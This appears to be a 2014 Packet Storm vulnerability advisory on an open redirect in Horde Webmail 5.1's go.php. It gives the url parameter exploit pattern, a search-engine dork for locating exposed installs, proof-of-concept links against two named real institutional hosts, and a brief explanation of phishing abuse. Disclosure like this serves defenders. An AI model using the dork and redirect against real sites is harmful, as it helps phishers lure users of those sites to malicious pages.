Horde Webmail 5.1 Open Redirect

2014-03-31T00:00:00
ID PACKETSTORM:125953
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-03-31T00:00:00

Description

                                        
                                            `[+] Horde webmail - Open Redirect Vulnerability   
[+] Date: 31/03/2014  
[+] Risk: Low  
[+] Remote: Yes  
[+] Author: Felipe Andrian Peixoto  
[+] Vendor Homepage: http://www.horde.org/apps/webmail  
[+] Contact: felipe_andrian@hotmail.com  
[+] Tested on: Windows 7 and Linux  
[+] Vulnerable File: go.php  
[+] Dork: inurl:horde/util/go.php?  
[+] Version: 5.1 probably other versions too  
[+] Exploit : http://host/horde/util/go.php?url=[ Open Redirect Vul ]  
[+] PoC: http://webmail.pmf.sc.gov.br/horde/util/go.php?url=http://www.horde.org/apps/webmail  
http://www.imp.polymtl.ca/horde/util/go.php?url=http://www.horde.org/apps/webmail  
  
Note : An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.   
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.  
Reference :https://www.owasp.org/index.php/Open_redirect  
`